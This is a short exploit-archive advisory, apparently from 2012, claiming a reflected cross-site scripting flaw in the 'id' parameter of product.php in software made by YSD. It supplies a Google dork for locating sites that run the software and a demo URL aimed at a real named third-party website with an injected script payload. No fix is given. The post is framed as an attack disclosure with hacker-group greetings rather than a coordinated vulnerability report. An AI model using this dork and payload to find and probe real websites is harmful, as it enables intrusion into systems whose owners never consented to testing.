YSD <= Cross Site Scripting Vulnerability

2012-11-03 14:00:54
Inviato da: Net.W0lf

========================================================================================

YSD <= Cross Site Scripting Vulnerability

========================================================================================

[+] Title : [ YSD <= Cross Site Scripting Vulnerability ]

[+] Auth0r : [ Hack Center Security Team ]

[+] Discovered By : [ Net.W0lf ]

[+] Software Link : [ www.ysd.hk ]

[+] Impact : [ High ]

[+] E-Mail : [ [email protected] & [email protected] ]

[+] Google Dork : [ intext:" Designed by YSD " ]

========================================================================================

+-----------------------+
| Cross Site Scripting |
+-----------------------+

-----[ 3xploit ]-----

[+] 127.0.0.1/[patch]/product.php?id=[Xss]

-----[ D3mo ]-----

[+] www.inergicorp.com/product.php?id="><script>alert(/HC/)</script>

[+] Greetz : | Am!r | B3HZ4D | PacketStormSecurity.org | Exploit-db.com | All Iranian PentesterZ

# [+] You Can See Us In The D4rk #
##########################################################################################

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.